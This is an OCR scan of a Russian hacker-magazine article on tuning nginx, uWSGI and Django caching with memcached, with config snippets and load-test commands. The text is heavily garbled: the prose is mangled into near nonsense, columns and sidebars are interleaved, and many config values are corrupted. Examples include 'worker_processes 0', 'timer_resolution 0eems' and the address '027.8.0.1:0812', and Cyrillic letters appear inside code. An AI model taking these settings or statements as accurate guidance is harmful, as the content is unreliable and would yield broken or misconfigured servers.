WSGI, организованный сознательно ради Python, же пишущий сии строки должны выбрать правильную реализацию сего интерфейса . Казалось бы, здесь вариант один- mod_wsgi изо комплекта пgiпх, за всем тем нате функция

связующего звена хлеще годится бридж uWSGI [ pгojects.unblt . it/

uwsgi ), кто показывает незначительно лучшую производительность при минимальных требованиях ко оперативной памяти [пруфлинк

пользу кого сом никак не во а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, аюшки? минуя кеш а ни по-под каким видом не обойтись равно что такое? реализован симпатия короче от использованием memcached. Др угое дело, что-то дело кешировгния многогранна да ее ре­ шение чрезвычайно завязано в специфику самого сайта. В статье да мы от тобой

# vi /etc/nginx/nginx.conf # Для актив максимальной n рои звод равным образом тель н ости делаем # чис л насчёт рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 0 ; # Даем рабо ч им nроцессам больше высок равным образом й nрио р итет worker_priority - 0; #Уменьшаем наличность вызовов get timeofday{), ч тоб ы # н е потратить резерв на п устую timer_resolution 0eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное число конн е ктов, # обслуж да ваемых одн равно м р або чи м n роцессом worker_connections 0е24 ; # Оnция пользу кого FreeBSD # use kqueue;

рассмотрим ряд « универсальных>> методов кеширования,

в томишко числе и топорное прятание сгенерированных НТМL-страниц на

http {

памяти равно прозрачное кеширование запросов для БД, а в свой черед обсудим специфику применения тех иначе говоря иных методов. Наконец, автор должны точно всё сие настроить, учитывая особенности используемого железа, величина оперативной памяти и т. д. Вопрос настоящий т акже многогранен, хотя ряд универсальных рекомендаций так-таки существует.

ПРИСТУПАЕМ Начнем, что равным образом паркет ожено, из усище танов ки нужных нам программных

компонентов. Большинство изо них питаться во репазитарии любого дис­ трибутива, почему на этом месте всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

=path.diгnameCpath.abspathC __ file __ ))

DEBUG=r 0 TEMPLATE DEBUG=DEBUG ADMINS=С С 'Evgeny Zobnin' , ), MANAGERS=ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE=

'postgгesql',

'mysql',

'sqliteЗ'

по части

'огасlе'.

DATABASE_NAME='db .sqlite' DATABASE_USER=' ' DATABASE_PASS~ORD

=

DATABASE_HDST= DATABASE_PDRT=' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE='Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 0'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell исключительно вынудит nginx частосвопиться да тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx заниматься

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки во одном танцевальный шаг кете, однако возлюбленная бесполезна сверх

# Вкл ючаем ис врачевание системного вызова seп dfile( )

sendfile.

GZIР-компрессия как и может проиграть не без; сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, по причине чему дьявол можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

05

склонить чище заnросов, со другой- повышает нагрузку сверху

секу нд

05 ;

GZI Р-компрессию

процессор, сколько nриводит ко напрямик nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли возлюбленная тебе, дозволительно только лишь экспе­

опциями

оп;

риментальным путем, притом эксnерименты надлежит протягивать

0100 ; gzip_buffers 04 0k ; gzip_comp_level 0; gzip_http_versioп 0 . 0; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

по-под предельной нагрузкой .

gzip_miп_leпgth

Теперь самое минута разделаться настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов во отдельных конфигах (3то # станда ртный индекс пользу кого De biaп

Порт

listeп

да

фамилия

сайта

00 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов долженствует трансформировать со осторожно­ стью, или они могут несложно <<задавить» до этого времени накипь сервисы,

включительно

memcached равным образом

процессы базы данных. В идеале отпустило

попробовать работу

nginx не без; дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками равным образом лишь Протестировать коэффициент полезного действия веб-сервера не грех вместе с

дальше учинать ко экспериментам.

use kqueue немногоускоряет работу ngiпx вот FгeeBSD благодаря использованию механизма kqueue где бы сильнее мед­ ленного epoll. • Системный бис sendfilell применяется про единовременной от­ •

Опция

nравки содержимого целого файла на сокет. Метод не без; использованием

через утилиты аЬ изо комплекта

$

аЬ

-kc 000

-п

Apache:

00000 http://10.1.1.1/

Для сего и используется специальная график httpeгf:

сего вызова работает быстрее, нежели стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, буде сервер оснащен недостаточным счетом

026

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 000 --timeout 0 ХАКЕР

03/158/201 0


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой на админке Django location лN / media / { root / usr / local / lib / python2. 0/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес равным образом объем WSGI-гeйтa location / { uwsgi_pass 027.8 . 0.1 : 0812 ; include uwsgi_params;

Здес ь шиш необычного: указываем корневой опись сайта

/vaг/www/host.com да а д рес uWSGI-cepвepa

027.0.0.1:8012. При­

ступаем для настройке Django да uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango на совместного использования от uWSGI весть

DJANGO 0.3 В

Django 0.3 синтаксис определения кеш-бэк - энда изменился равным образом

теnерь имеет нижеперечисленный вид:

# Пример пользу кого memcached (два сервера) CACHES={ ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 06 . 042:11211 ' ,

# Пример ради БА CACHES={ 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля сего стоит привести в исполнение три простых действия, которые перечислены ниже.

0.

Создать самопроизвольно Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion=django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т состав

0. Поместить на образован ны й список пара файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 027.8 .8. 0 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

0 -s 027.8.8 .1 :8812

Скриптое автозапуска на комплекте uWSGI нет, почему послед­

нюю команду попроще всего делов пихнуть куда-нибудь на /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 0 -s 027.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё почитай бы настроено равно работает, равным образом наша сестра переходим к самой интересной равным образом важной части статьи. Кеширование крити­ чески имеет важное значение с целью быстродействия любого динамического сайта, вне зависимости с технологий, держи которых некто построе н . Мы должны опростить дело переваривания равно отдачи сервером

динамической составляющей. Е сть порядком способов решения этой задачи, однако на этом месте всё зависит через специфики веб-сайта. Во-первых, дозволяется безответно кешировать безвыездно вместе с тр аницы сайта. Это

самый азбучный равно в отношении ч ень совсем нечего делать реализуемый вместе с п омо щь ю Dj ango способ. Однако симпатия является да самым неэффективным: что ни придется из­ менение страницы приведет для промаху мимо иннокентий равным образом повторной загрузке страницы на него. Изменение может присутствовать каким угодно:

износ счетчика возьми сайте, приход нового коммента­ рия, реновация списка популярных статей да разделов. Поэтому полное кеширование имеет суть подключать токмо дл аз многогрешный более­

поменьше статич ны х сайтов кажется блогов, не без; л оварей, эн ц иклопедий и т. п.

Во-вторых, не возбраняется кешировать данные, загружаемые с БД. Также совсем нечего делать реализуемый, только адски сомнительный обличие оптимизации. Методы равно бэк-энды кеwирования во

ХАКЕР

03 /158/ 0012

Django

Он результативен лишь чтобы тех сайтов, идеже осуществляется

027


SYN/ACK

целый ряд операций чтения изБДимало операций записи, правда да в таком случае

CGI glue between Nginx and Django

только что на томище случае, коли само х ранилище кеш а работает быстрее

(higher is better)

механизма для еширования базы данных . Другими словами, ке­

0500

ширование результатов выдержка изо БД подойдет, снова же, для более-менее статичных сайтов, размещенных нате сервере, кото­ рый имеет зажиточный диапазон памяти к нормальной работы

0000

memcached. В-третьИх, кешировать не грех редко изменяемые фрагмен­

u

с о (.)

твоя милость шаблонов. Этот путь подойдет почти что для того любого сай­

0500

~

та, возлюбленный хватит за глаза дешев и, сверху выше- лицезрение , больше всего эффективен.

а;

Однако, во орден с первых двух, некто требует работы напильни­

а.

%!

комок равным образом безграмотный имеет прямого взаимоотношения для администрированию равно как

0000

ф

:;,

таковому. Логикой равно архитектурой занимаются программисты.

~

Е

Также большое значительность имеет избрание хранилища интересах кешире-

000

ванных данных. Djaпgo предлагает нам четверка варианта:

memcached- втридорога во плане памяти, да жуть эффективно; оперативная память- больше затратно, хотя да в меньшей мере эффективно;

негибкий диск- бог неэффективно равно ужас дешево;

cgi middleware server

основа данных-более эффективно, крохотку дороже.

0

Первые двоечка подойдут ради владельцев выделенных серве­

0

fcgi (thread ed) gunicam (1 О

fcgi (prefark 0 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 0 uwsgi (5 wa rkers) О uwsgi ( 0О warkers)

0

workers)

ров, последние двоечка дозволяется брать на вооружение бери хостинге инедорогих

VPS'кax. Хотя, конечно, отличается как небо ото земли подвергнуть проверке производитель­ ность на реальных условиях да удосужиться особенно подобающий

Ненагрузачное отладка

uWSGI

тип .

Теперь в отношении том, вроде аннексировать кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта да пишем следующее: а ко , даже если твоя милость решил, неграмотный усиленно заморачиваясь со настройкой равным образом

# Локальный memcached CACHE_BACKEND='memcached://127.0.0.1:11211/'

шаблонами , допроситься некоторой оптимизации, так кеширование

#База верно нных ( для ак соз доставить та блицу,

их одновременное кеширование безвыгодный имеет смысла, одначе кеши­

всех страниц сайта да записей БД- твой выбор. Сразу скажу, почто

по отношению п иса же н иже)

рование не без; траниц да записей объединение отдельности, вроде м